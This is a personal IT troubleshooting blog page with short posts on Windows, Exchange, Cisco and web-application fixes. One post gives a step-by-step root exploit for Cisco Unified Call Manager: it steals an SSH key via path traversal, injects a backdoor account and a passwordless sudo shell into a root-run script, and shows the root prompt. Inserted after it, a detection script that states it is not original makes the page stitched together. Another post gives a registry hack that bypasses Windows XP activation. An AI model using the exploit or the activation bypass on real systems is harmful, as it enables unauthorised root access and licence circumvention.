My Writings. My Thoughts.

can’t add printer due to NT4 policy in effect

2003/2008 Server, Windows 7, Windows Vista, Windows XP | July 21st, 2010

For some printer models, the manufacturer does not package the drivers so that they can be installed as Additional Drivers on a print server. This is the case for many of the less expensive bubble jet, inkjet and multi-function (e.g. scanner/fax/printer) models. The manufacturers deem these to be “personal” printers for use only on the computer to which they are physically connected (parallel, USB or serial port). The manufacturer often says that printing over the network is “not supported” for these models.

If you attempt to install the drivers for these models as Additional Drivers (see for example Install Additional Driver on older OS), you will get some kind of an error or a request for the driver that can not be satisfied no matter what you do. You may also get an error message stating that there is a policy in effect that doesn’t allow NT4 drivers to be installed.

Unfortunately, there are some models that can not be used over the network because the print device and printer driver have to be in bi-directional communication throughout the printing process. The manufacturer’s documentation does not always make this requirement apparent, although there may be FAQs or other documents on the manufacturer’s web site that state this.

Except for those models discussed in the previous paragraph, you can bypass this problem by adding the printer as a local printer on the client computer and associating the printer with a network printer port (i.e. re-direct it to the printer share on the print server). No harm will be done by trying this approach if it doesn’t work, so it’s usually worth a try.

Here’s how to install a printer locally and re-direct it to a network printer port. These instructions are written for Windows XP. This technique does work with Windows 7, Vista, 2008, and 2003 but the dialogs are a bit different, so you may have to read between the lines.

  • Logon at the client computer with a user account that has administrative rights and permissions on the client computer.
  • Click Start, Printers and Faxes
  • Right click in an empty space in the right pane and select Add Printer
  • Click Next
  • Select the Local Printer… radio button, remove the check mark from Automatically detect and install my Plug and Play printer; click Next
  • Select the Create a new port: radio button; from the Type of port: drop down list, select Local Port; click Next
  • In the Enter a port name: text box, key exactly the UNC name of the network printer (e.g. \\printservername\printersharename); click OK
  • Select the appropriate entries from the Manufacturer and Printers columns, or click the Have Disk button, as appropriate
  • Follow through the rest of the Add Printer wizard.

Jailbreak Cisco Unified Call Manager

Cisco, Hardware | July 15th, 2010


  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    ^Z
            1 file(s) copied.
    
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
    

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
    
  6. Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
    
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
    
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
    
  9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    
    Download directory: InYourFace
    
    Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
    admin:
    
  10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:
    login as: jail
    jail@cucm.example.com's password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
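
A defender-side check for the artifacts steps 7 to 10 leave behind, as an added example that is not part of the original post: it flags passwd accounts missing from a known-good baseline and sudoers NOPASSWD rules that hand out a shell. The baseline set, the function names and the sample file contents are constructed for illustration; on a real host you would feed in the contents of /etc/passwd and /etc/sudoers.

```python
import re

# Constructed sample data (assumption: not copied from a real appliance).
BASELINE_USERS = {"root", "admin", "sftpuser", "backup"}
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
admin:x:500:500::/home/admin:/bin/bash
sftpuser:x:501:501::/home/sftpuser:/bin/bash
backup:x:502:502::/home/backup:/sbin/nologin
jail:x:1337:1337::/tmp:/bin/bash
"""
SAMPLE_SUDOERS = """\
# constructed sudoers sample
root ALL=(ALL) ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync
jail ALL=(root) NOPASSWD: /bin/bash
"""
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/ksh", "/bin/csh", "/bin/zsh"}
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)$")

def unexpected_accounts(passwd_text, baseline):
    """Return (name, uid, shell) for passwd entries missing from the baseline."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        # Skip comments and malformed lines instead of failing on them.
        if line.startswith("#") or len(fields) != 7 or not fields[2].isdigit():
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if name not in baseline:
            found.append((name, uid, shell))
    return found

def risky_sudo_rules(sudoers_text):
    """Return (user, command) for NOPASSWD rules that grant a shell or ALL."""
    found = []
    for line in sudoers_text.splitlines():
        match = RULE.match(line.split("#", 1)[0].strip())
        if not match:
            continue
        user, commands = match.groups()
        for cmd in (c.strip() for c in commands.split(",") if c.strip()):
            if cmd == "ALL" or cmd.split()[0] in INTERACTIVE_SHELLS:
                found.append((user, cmd))
    return found

if __name__ == "__main__":
    print(unexpected_accounts(SAMPLE_PASSWD, BASELINE_USERS))
    print(risky_sudo_rules(SAMPLE_SUDOERS))
```

Any script that a root-owned process executes from a directory an unprivileged account can write to, as sftp_connect.sh is here, deserves the same baseline comparison.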
    

OWA – ‘gtLV’ is null or not an object

Exchange 2007, Internet Explorer, Scripts, Web Applications | July 15th, 2010

I was getting the “‘gtLV’ is null or not an object” message when I replied to an email using our Microsoft Online Hosted Exchange email account. Ironically enough, the problem would always occur when I replied to a new email from a Microsoft support engineer. The email would go through but I would get the “‘gtLV’ is null or not an object” error message popup on the screen. If I replied to the email again the problem would not occur. A very similar message can be seen in the Microsoft Exchange Server forums where I also posted the provided solution.

After many emails to the very patient support tech at Microsoft (as I would reply and then send an email to let him know if the reply worked or not) we escalated the ticket and I got back the following resolution.

1. type regedit on command prompt or run
2. go to: HKCU\Software\Microsoft\Internet Explorer\Main
3. create TabProcGrowth (string or dword) and set the value to 0

This solution worked for me. From what I can see at the ie8blog this has the side effect of reducing the Protected Mode protection and I think the browser tabs use the same process rather than running in separate processes. This is a slight downside, but I doubt many users will care – they’re more than happy to have OWA working.

Cisco ATA 186 and 10.1.1.1

Cisco, Hardware | May 11th, 2010

If you notice any issues on your firewall regarding your ATA 186, it’s most likely because of a factory hardware error that causes the ATA to try to create a route to a nonexistent CCM at 10.1.1.1 as a backup. Find the IP address of your ATA, enter it in your browser and append /dev to the URL. On the SCCP page, change both CCM addresses to your own addresses. If you only have one CCM, put it in both boxes.

roaming profiles corruption

Active Directory, Windows XP | April 29th, 2010

Some newer software can leave handles open during the logoff event. Smarttech smartboards come with a program called Notebook which is notorious for locking directories. Disabling the following services can fix a lot of roaming profile issues:

Windows Search Service and WebClient Service (WebDAV)

Adding DelProf.exe to your logoff script in Active Directory is also a nice addition to keep roaming profiles working correctly.

can’t change ie8 default search provider

Internet Explorer | April 15th, 2010

In some situations IE8 disallows changing the default search provider. This can happen on workgroups and domains even if the “restrict changing search provider” GPO is not configured.

  • Make sure IE 8 is closed then navigate to registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • Add a new “Expandable String value” inside the above mentioned key with a value name of “AppData” and a value data of “%USERPROFILE%\Application Data”.
  • Reopen IE 8 and see if you still get the error message.

KnowledgeTree Dropbox

Web Applications | April 15th, 2010

ISSUE:

In certain environments, after an upgrade to KnowledgeTree 3.6.x, an issue with permissions on the “var” directory and sub directories results in the following exception error:
<ErrorReport Project="BaobabClient"> <UserReport Short="Exception found [mkdir() [<a href='function.mkdir'>function.mkdir</a>]: Permission denied].">

This also applies when a document upload stalls at the “Metadata Capture” screen with the message “Initializing, please wait …”, and to the permission denied message when connecting Dropbox to your KT URL.

To resolve this issue, check the following:

1. The user running the apache server should have correct permissions on the following folder and sub folders: <KnowledgeTree Directory>\var

2. Navigate to DMS Administration > System Configuration > General Settings > Urls > Var Directory and check that the path to the var directory is pointing correctly at your <KnowledgeTree Directory>/var folder

The above steps should resolve this issue on Windows and most Linux installs. For Linux users still encountering a problem, continue to Step 3.

3. Check that the following directory exists: <KnowledgeTree Directory>/var/proxies/nobody

If not, run the following commands from the terminal in order to create and set permissions for this directory:
mkdir <Path to KnowledgeTree directory>/var/proxies/nobody
chown nobody <Path to KnowledgeTree directory>/var/proxies/nobody

Activate/WGA fix for Windows XP

Active Directory | April 14th, 2010

  • Open regedit
  • Find HKEY Local\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents
  • Find the string OOBETimer
  • Double click and change the value to this one: FF D5 71 D6 8B 6A 8D 6F D5 33 93 FD
  • Right click on WPAEvents and choose permissions
  • Change “system” and check deny all
  • Restart Your PC

user profile service failed the logon

Windows 7, Windows 8, Windows Vista | March 12th, 2010

To reset a corrupt profile in Vista/7/8:

  • Open regedit with administrator rights
  • Find HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
  • Delete the root key that includes the username you want to reset (DON’T remove the others)
  • Rename or remove the username directory under c:\users
  • Reboot and log the user on to recreate the profile; reboot again to apply GPOs if it’s a domain workstation

peerblock

Security | March 9th, 2010

For those who have used PeerGuardian exclusively for the past few years, Phoenix Labs has released their new product, PeerBlock. PeerBlock lets you control who your computer “talks to” on the Internet. By selecting appropriate lists of “known bad” computers, you can block communication with advertising or spyware oriented servers, computers monitoring your p2p activities, computers which have been “hacked”, even entire countries! They can’t get in to your computer, and your computer won’t try to send them anything either.
